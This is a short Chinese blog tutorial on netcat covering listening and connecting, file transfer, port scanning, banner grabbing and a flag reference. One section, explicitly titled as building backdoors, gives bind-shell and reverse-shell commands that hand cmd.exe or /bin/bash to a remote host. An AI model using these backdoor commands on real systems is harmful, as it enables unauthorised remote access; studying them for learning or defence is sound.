2022-02-18 21:26阅读: 199评论: 0推荐: 0

netcat的使用

netcat 的使用

netcat 基本使用

在 netcat 中,原本的服务器被当作是客户端,而原本的客户端被当作是服务端.
从而使服务器连接客户端.

以下则为图示.

基础使用方法

创建一个服务端的方法

nc -l -p [localport]

-l 参数是指监听模式
-p 参数是指指定端口

创建一个客户端(连接服务端)的方法

nc [remote_ip] [remote_port]

使用以上方法后,仅仅实现了一个简单的通信系统,并不能对极其进行命令执行

返回 shell 的使用

nc 服务端(windows)

nc -l -p [local_port] -e cmd.exe

-e 参数是当建立会话后,返回的程序

nc 客户端(kali)

nc 192.168.2.12 [remote_port]

乱码问题可通过输入 chcp 65001 解决

nc 文件传输

创建一个服务端的方法

nc -l -p [local_port] > outfile(指的是输出的文件)

创建一个客户端的方法

nc [remote_ip] [remote_port] < infile(指的是输入的文件)
值得注意的是,无论什么情况(服务端还是客户端),均可传输文件.同时,">"代表接受到的文件,"<"代表要传输的文件

nc 信息探测

端口扫描(不推荐,仅了解)

nc -v -n -z -w1 [target_ip] [start_target_port - end_target_port]

-v 输出详细信息
-n 告诉nc不要使用DNS反向查询IP地址的域名
-z zero I/O 模式,专用于端口扫描.表示连接成功后立即关闭连接,不进行数据交换
-w1 超时设置为1秒

抓取端口 Banner(可能可以获得对方操作系统或其他信息)

echo " " | nc -v -n -w1 [target_ip] [start_target_port - end_target_port]

nc 建立后门

Windows 建立后门

监听型后门(nc 服务端)
nc -l -p [local_port] -e cmd.exe
连接型后门(nc 客户端)
nc [remote_ip] [remote_port] -e cmd.exe

linux 建立后门

监听型后门(nc 服务端)
nc -l -p [local_port] -e /bin/bash
连接型后门(nc 客户端)
nc [remote_ip] [remote_port] -e /bin/bash

nc 命令参数

-d 在后台运行,常用于后门建立

-e 执行某个程序,常用于后门建立

-G gateway 设置网关,常用于突破内网限制

-g num 路由跳数

-i sec 设置发送每一行数据的时间间隔

-l 设置nc处于监听状态等待连接

-L 基本同-l,但当服务端断开,服务端依旧回到等待状态

-p port 设置本地监听的端口号

-n 告诉nc不要使用DNS反向查询IP地址的域名

-o file 设置传输十六进制的数据

-r 设置nc随机化的端口

-s addr 设置nc源地址

-t 回复telnet的请求数据包

-u 设置nc使用UDP模式

-v 输出详细信息

-w sec 设置连接超时秒数

-z zero I/O 模式,专用于端口扫描.表示连接成功后立即关闭连接,不进行数据交换

本文作者:wedfrgt

本文链接:https://www.cnblogs.com/wedfrgt/p/15911340.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   wedfrgt  阅读(199)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起
  1. 1 404 not found REOL
  2. 2 悪魔の子(恶魔之子) Mochoc
  3. 3 冒険でしょでしょ? 平野綾
冒険でしょでしょ? - 平野綾
00:00 / 00:00
An audio error has occurred, player will skip forward in 2 seconds.